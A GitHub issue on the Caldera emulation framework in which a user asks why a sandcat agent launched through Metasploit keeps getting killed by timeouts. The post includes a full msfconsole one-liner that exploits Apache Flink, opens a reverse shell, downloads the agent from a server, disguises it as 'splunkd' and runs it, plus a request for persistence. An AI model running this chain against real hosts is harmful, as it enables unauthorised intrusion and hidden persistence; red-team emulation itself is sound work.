Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Attempting to achieve lateral movement using sandcat agent and metasploit #2957

Open
NoorElAlfi opened this issue Apr 23, 2024 · 2 comments
Open

Attempting to achieve lateral movement using sandcat agent and metasploit #2957

NoorElAlfi opened this issue Apr 23, 2024 · 2 comments
Assignees
@elegantmoose
Labels
bug good write up

Comments

@NoorElAlfi
Copy link

Hello,

I am trying to use Caldera alongside Metasploit to achieve lateral movement on a Linux target host, I've managed to get a Metasploit one line command to achieve a reverse shell and run a sandcat agent on the target host. This is the command I've been using that works through the terminal:

msfconsole -q -x "use exploit/multi/http/apache_flink_jar_upload_exec; \
set rhosts x.x.x.x; \
set payload java/shell_reverse_tcp; \
exploit -j; \
sessions -i 1 -c 'curl -s -X POST -H \"file:sandcat.go\" -H \"platform:linux\" \"http://x.x.x.x:8888\"/file/download > splunkd'; \
sessions -i 1 -c 'chmod +x splunkd'; \
sessions -i 1 -c './splunkd -server \"http://x.x.x.x:8888\" -group red -v; &";

Bug Description
Whenever I attempt to run this through the Caldera web server using a sandcat agent I either get an "stty: 'standard input': Inappropriate ioctl for device" error or the command actually goes through and starts the sandcat agent on the target host but is short lived as a result of the process being killed due to a timeout. I've attempted to mitigate the second issue by running the agent in the background using an & but the process still gets killed anyway. Is there anyway I can have the sandcat agent persist on the target host without worrying about the command timing out? (Screenshots of the errors are below in the Screenshot section)

To Reproduce
Steps to reproduce the behavior:

  1. Run an instance of Caldera on an attacking Linux host with Metasploit installed, and using a sandcat agent I load the Metasploit abilities onto Caldera using the access plugin
  2. I generate an adversary consisting of the reverse shell exploit I'm using, I update the command to the one above and hardcode the target hosts IP into the command for testing purposes
  3. I run the operation using the adversary I just generated through the sandcat agent, the reverse shell is achieved and the sandcat agent is briefly started just to be killed due to timeout or the "stty: 'standard input': Inappropriate ioctl for device" error.

Expected behavior
I am wanting the command to be considered successful by the operation status, and the sandcat agent to persist on the target host without the process being killed.

Screenshots
error1
error2

Desktop:

  • OS: Ubuntu 18.04
  • Browser: Chromium
@NoorElAlfi NoorElAlfi added the bug label Apr 23, 2024
@github-actions GitHub Actions
Copy link

Looks like your first issue -- we aim to respond to issues as quickly as possible. In the meantime, check out our documentation here: http://caldera.readthedocs.io/

@elegantmoose
Copy link
Contributor

@NoorElAlfi Apologies for late response. TLDR - Im not the right person for looking into this issue. Im going to have to see if any on the team has messed with Metasploit integrations recently.

*Also, let us know if you make progress.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@elegantmoose elegantmoose

Labels
bug good write up
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@elegantmoose @NoorElAlfi